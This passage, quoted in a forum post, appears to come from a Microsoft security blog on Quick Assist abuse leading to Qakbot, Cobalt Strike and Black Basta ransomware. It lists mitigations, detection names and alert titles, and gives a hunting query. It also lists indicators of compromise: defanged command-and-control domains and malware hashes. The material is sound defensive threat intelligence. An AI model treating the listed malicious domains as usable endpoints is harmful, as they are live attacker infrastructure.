[URL='https://www.microsoft.com/security/business/security-101/what-is-email-security?ocid=magicti_ta_abbreviatedmktgpage']protecting personal and business information[/URL] in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity. [*]Educate users about [URL='https://www.microsoft.com/security/business/security-101/what-is-malware?ocid=magicti_ta_abbreviatedmktgpage']preventing malware infections[/URL], such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls. [*]Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. [URL='https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-security-center-mdo?ocid=magicti_ta_learndoc']Microsoft Defender for Office 365[/URL] brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats. [*]Turn on [URL='https://learn.microsoft.com/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus']cloud-delivered protection[/URL] in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants. [*]Enable [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=magicti_ta_learndoc']network protection[/URL] to prevent applications or users from accessing malicious domains and other malicious content on the internet. [*]Turn on [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection']tamper protection[/URL] features to prevent attackers from stopping security services. [*]Enable [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations']investigation and remediation[/URL] in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. [*]Refer to [URL='https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/']Microsoft’s human-operated ransomware overview[/URL] for general hardening recommendations against ransomware attacks. [/LIST] Microsoft Defender XDR customers can turn on [URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc']attack surface reduction rules[/URL] to prevent common attack techniques: [LIST] [*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion']Block executable files from running unless they meet a prevalence, age, or trusted list criterion[/URL] [*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-execution-of-potentially-obfuscated-scripts']Block execution of potentially obfuscated scripts[/URL] [*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands']Block process creations originating from PSExec and WMI commands[/URL] [*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#use-advanced-protection-against-ransomware']Use advanced protection against ransomware[/URL] [/LIST] [HEADING=1]Detection details[/HEADING] [HEADING=2]Microsoft Defender Antivirus [/HEADING] Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware: [LIST] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Qakbot']TrojanDownloader:O97M/Qakbot[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qbot']Trojan:Win32/QBot[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qakbot']Trojan:Win32/Qakbot[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Qakbot']TrojanSpy:Win32/Qakbot[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/threat-search?query=Behavior:Win32/Qakbot.A']Behavior:Win32/Qakbot[/URL] [/LIST] Black Basta threat components are detected as the following: [LIST] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Basta.B&threatId=-2147132479']Behavior:Win32/Basta[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Basta.AA&threatId=-2147149077']Ransom:Win32/Basta[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Basta!BV&threatId=-2147142676']Trojan:Win32/Basta[/URL] [/LIST] Microsoft Defender Antivirus detects Beacon running on a victim process as the following: [LIST] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/CobaltStrike']Behavior:Win32/CobaltStrike[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/CobaltStrike&threatId=-2147180169']Backdoor:Win64/CobaltStrike[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win64/CobaltStrike']HackTool:Win64/CobaltStrike[/URL] [/LIST] Additional Cobalt Strike components are detected as the following: [LIST] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375']TrojanDropper:PowerShell/Cobacis[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/TurtleLoader.CS!dha&threatId=-2147187531']Trojan:Win64/TurtleLoader.CS[/URL] [*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/ShellCode.BN&threatId=-2147237640']Exploit:Win32/ShellCode.BN[/URL] [/LIST] [HEADING=2]Microsoft Defender for Endpoint[/HEADING] Alerts with the following title in the security center can indicate threat activity on your network: [LIST] [*]Suspicious activity using Quick Assist [/LIST] The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity. [LIST] [*]Suspicious curl behavior [*]A file or network connection related to a ransomware-linked emerging threat activity group detected —[I]This alert captures Storm-1811 activity[/I] [*]Ransomware-linked emerging threat activity group Storm-0303 detected — [I]This alert captures some Qakbot distributor activity[/I] [*]Possible Qakbot activity [*]Possible NetSupport Manager activity [*]Possibly malicious use of proxy or tunneling tool [*]Suspicious usage of remote management software [*]Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) [*]Human-operated attack using Cobalt Strike [*]Ransomware behavior detected in the file system [/LIST] [HEADING=1]Indicators of compromise[/HEADING] [B]Domain names:[/B] [LIST] [*]upd7a[.]com [*]upd7[.]com [*]upd9[.]com [*]upd5[.]pro [/LIST] [B]SHA-256:[/B] [LIST] [*]71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8 [*]0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0 [*]1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30 [*]93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7 [*]1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb [/LIST] [B]ScreenConnect relay:[/B] [LIST] [*]instance-olqdnn-relay.screenconnect[.]com [/LIST] [B]NetSupport C2:[/B] [LIST] [*]greekpool[.]com [/LIST] [B]Cobalt Strike Beacon C2:[/B] [LIST] [*]zziveastnews[.]com [*]realsepnews[.]com [/LIST] [HEADING=1]Advanced hunting [/HEADING] [HEADING=2]Microsoft Defender XDR[/HEADING] To locate possible malicious activity, run the following query in the Microsoft Defender portal: This query looks for possible email bombing activity: EmailEvents | where EmailDirection == "Inbound" | make-series Emailcount = count() on Timestamp step 1h by RecipientObjectId | extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount) | mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp | where Anomalies != 0 | where AnomalyScore >= 10 [HEADING=2]Microsoft Sentinel[/HEADING] Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the [URL='https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy']Microsoft Sentinel Content Hub[/URL] to have the analytics rule deployed in their Sentinel workspace. Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following: Qakbot: [LIST] [*][URL='https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/Qakbot']Qakbot hunting queries[/URL] [/LIST] Cobalt Strike: [LIST] [*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker%20Tools%20Threat%20Protection%20Essentials/Hunting%20Queries/CobaltDNSBeacon.yaml']Cobalt Strike DNS Beaconing[/URL] [*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/Potential%20ransomware%20activity%20related%20to%20Cobalt%20Strike.yaml']Potential ransomware activity related to Cobalt Strike[/URL] [*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/FalconFriday/Analytic%20Rules/SuspiciousNamedPipes.yaml']Suspicious named pipes[/URL] [*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/cobalt-strike-invoked-w-wmi.yaml']Cobalt Strike Invocation using WMI[/URL] [/LIST] [HEADING=1]References[/HEADING] [LIST] [*][URL='https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf']Defense and Mitigations from E-mail Bombing[/URL]. U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center [/LIST] [HEADING=1]Learn more[/HEADING] For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: [URL="https://aka.ms/threatintelblog"]Threat intelligence | Microsoft Security Blog[/URL]. To get notified about new publications and to join discussions on social media, follow us on LinkedIn at [URL="https://www.linkedin.com/showcase/microsoft-threat-intelligence"]Microsoft Threat Intelligence | LinkedIn[/URL], and on X (formerly Twitter) at [URL]https://twitter.com/MsftSecIntel[/URL]. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: [URL]https://thecyberwire.com/podcasts/microsoft-threat-intelligence[/URL]. The post [URL='https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/']Threat actors misusing Quick Assist in social engineering attacks leading to ransomware[/URL] appeared first on [URL='https://www.microsoft.com/en-us/security/blog']Microsoft Security Blog[/URL]. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
